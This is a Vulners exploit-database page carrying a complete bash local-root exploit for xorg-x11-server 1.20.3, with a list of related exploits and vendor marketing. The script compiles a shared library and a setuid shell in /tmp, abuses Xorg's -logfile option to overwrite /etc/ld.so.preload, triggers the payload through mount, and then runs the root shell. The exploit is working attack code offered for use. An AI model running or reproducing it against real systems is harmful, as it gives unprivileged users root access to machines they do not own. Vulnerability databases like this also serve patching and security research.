Vulners
Lucene search
xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit (2)
| Reporter | Title | Published | Views | Family All 131 |
|---|---|---|---|---|
 | xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit | 26 Oct 201800:00 | – | zdt |
| xorg #x11 #server 1.20.3 - Privilege Escalation Exploit (3) | 30 Oct 201800:00 | – | zdt |
| xorg-x11-server < 1.20.1 - Local Privilege Escalation Exploit | 13 Nov 201800:00 | – | zdt |
| Xorg X11 Server SUID Privilege Escalation Exploit | 26 Nov 201800:00 | – | zdt |
| xorg-x11-server < 1.20.3 - modulepath Local Privilege Escalation Exploit | 1 Dec 201800:00 | – | zdt |
| Xorg X11 Server (AIX) - Local Privilege Escalation Exploit | 4 Dec 201800:00 | – | zdt |
| xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab) Exploit | 14 Jan 201900:00 | – | zdt |
| Xorg X11 Server SUID modulepath Privilege Escalation Exploit | 22 Oct 201900:00 | – | zdt |
| Xorg X11 Server Local Privilege Escalation Exploit | 13 Nov 201900:00 | – | zdt |
 | Exploit for Race Condition in Canonical Ubuntu_Linux | 27 Jul 202504:02 | – | gitee |
10
xorg-x11-server Local Privilege Escalation (2)
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Hack the planet!"
cd /etc; Xorg -fp "/tmp/libhax.so" -logfile ld.so.preload :1;
mount # arbritary setuid we run to pop root
echo "[+] Tidy up a bit..."
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
/tmp/rootshell
# 0day.today [2018-10-26] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Oct 2018 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.16034